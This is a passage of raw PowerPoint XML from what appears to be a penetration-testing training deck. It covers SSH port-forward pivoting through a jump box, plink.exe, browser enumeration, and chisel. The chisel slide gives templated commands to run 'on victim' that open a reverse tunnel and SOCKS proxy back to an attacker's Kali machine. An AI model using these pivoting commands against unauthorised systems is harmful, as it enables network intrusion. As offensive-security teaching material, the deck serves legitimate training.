          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27424D16-5160-4411-B1E5-7C1863C39219}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7342474" y="5650594"/>
              <a:ext cx="2786948" cy="29362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59" name="Group 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AECE3D-DD91-4058-8E8F-E48FC260CB56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2154941" y="2758314"/>
            <a:ext cx="7935387" cy="1336355"/>
            <a:chOff x="1995351" y="2758314"/>
            <a:chExt cx="7935387" cy="1336355"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle: Rounded Corners 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34ABEFD1-730B-4496-A73B-6C101E442040}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5270561" y="3098212"/>
              <a:ext cx="2924175" cy="323850"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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SSH Tunnel </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="sng" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>TO</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Target</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Arrow: Right 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18587466-9A61-456A-8D4B-4424A7614CC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8385235" y="3098213"/>
              <a:ext cx="571501" cy="32385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F42CEE22-C545-4474-8546-C92BDBFA9E94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4118036" y="2979149"/>
              <a:ext cx="962026" cy="619125"/>
              <a:chOff x="2862262" y="5176837"/>
              <a:chExt cx="962026" cy="619125"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="Rectangle 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C066C9B-A820-4D95-A1CC-51FFF3997D9C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3548063" y="5176837"/>
                <a:ext cx="276225" cy="619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49" name="Arrow: Right 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0C22958-F69E-4DDE-91E6-55349B09A2DE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2862262" y="5324475"/>
                <a:ext cx="547688" cy="3238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46" name="TextBox 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF444A19-DF38-4DCB-8F9F-2B04AA47C610}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4338707" y="3567079"/>
              <a:ext cx="12064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Kali Port</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{981830EA-1DCB-4761-B545-8E0623031AF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8724253" y="3725337"/>
              <a:ext cx="12064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Any Port</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="TextBox 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E21B72-C22C-4303-80D9-E8824A2D6435}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1995351" y="2979149"/>
              <a:ext cx="1897554" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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SSH Command run here</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="Group 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{394DA1C1-501E-4EB1-B3E7-DEDCDCF53ECD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9136113" y="2758314"/>
              <a:ext cx="276228" cy="1003645"/>
              <a:chOff x="9075793" y="2714904"/>
              <a:chExt cx="276228" cy="1003645"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Rectangle 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A37E04B-D8A5-4BE8-8DB5-999DBA81F325}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9075794" y="2714904"/>
                <a:ext cx="276225" cy="2808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54" name="Rectangle 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC36B47A-AB7D-4EFC-886A-278471EF387A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9075796" y="3077778"/>
                <a:ext cx="276225" cy="2808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AE50ACB9-F7CA-44C5-9B87-06E5E0EB5422}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9075793" y="3437704"/>
                <a:ext cx="276225" cy="2808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9213875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B5C3F-E646-4AFA-B504-380BF7F39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F884518-99C7-4A22-9FF2-0A776207275E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example – Nmap Distant Host via Jump Box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{699D3F23-9DB0-4D34-9694-685F65101F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678966" y="1741129"/>
            <a:ext cx="5159187" cy="937341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5ECE8B-0B7A-4EC6-83ED-96BE2F633F31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2799397" y="2961639"/>
            <a:ext cx="6923723" cy="2362201"/>
            <a:chOff x="2047557" y="2852420"/>
            <a:chExt cx="8543925" cy="3124200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{905B3A09-AC99-4B70-8CD5-68432DD016D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2047557" y="2852420"/>
              <a:ext cx="8543925" cy="3124200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63861305-39F1-4BD8-819D-07A8C4E21C99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4441139" y="4267707"/>
              <a:ext cx="2061261" cy="283973"/>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1" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D53E4E-238A-4877-AE00-E84EFDE308F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6933341" y="3136228"/>
            <a:ext cx="1670380" cy="214711"/>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603954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B5C3F-E646-4AFA-B504-380BF7F39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F884518-99C7-4A22-9FF2-0A776207275E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can even use your browser!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E160A326-DDF7-4A40-8BD2-23D5DF79D366}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845395" y="1539707"/>
            <a:ext cx="8314140" cy="2423370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8D1638-E8B7-4A91-AC01-7580D7A2E720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3468421" y="4327568"/>
            <a:ext cx="5464013" cy="1447925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22C643B6-4974-4489-801B-443C053AEAC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2113228" y="3352123"/>
            <a:ext cx="8046307" cy="29362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649102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D308F-50CE-44E2-A0F5-5A66B138A7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AD1AB4-609C-4B2A-9EAE-4647DF1B0F4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But… What if there’s no SSH client?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{605E9B44-1498-477F-97F5-ECD47C669109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11460480" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Windows: plink.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax is almost identical to SSH client for port forwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>optionally specify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-pw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BEWARE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: your password might be logged/captured in terminal history if you do that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Windows/Linux: chisel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download binaries from GitHub or compile your own (Golang)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111979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FFB1F-4060-4442-94C7-9390E36E04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6F1A859-B97A-43A0-A447-5CB851A615FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2711BF69-0928-4A12-8E89-D7DF8C42B347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295399"/>
            <a:ext cx="7429182" cy="1590897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most browsers have built in developer tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Right-click: View Page Source | Inspect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good way to get a peek under the hood, though don’t expect easy wins often</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A52983-7589-49A1-AC14-4B52DAD461A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="53650"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="659202" y="3068319"/>
            <a:ext cx="9126224" cy="1518920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3C35A1D-8155-420F-B4A1-2C463367C28F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2474503" y="4758205"/>
            <a:ext cx="9211961" cy="1590897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{288237F4-CD5E-4357-9AA2-035F09B68C02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8637729" y="1024113"/>
            <a:ext cx="2829320" cy="2591162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11737196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E80F6-CE8A-4518-AC81-EFC21AE802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0786901-4944-4E69-B5C4-452A045D9786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chisel Syntax/Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81150843-FEBB-4C89-8B21-2FCA8D658F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185928" y="1063788"/>
            <a:ext cx="11582400" cy="2794000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Kali: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chisel server -p &lt;port&gt; [--socks5] –-reverse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On victim:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chisel client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kaliIP:serverport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> R:kaliport:targetip:targetport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a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Potentially needed:</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kaliuser:kalipass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chisel client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kaliIP:serverport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> R:socks</a:t>
            </a:r>
          </a:p>
          <a:p>
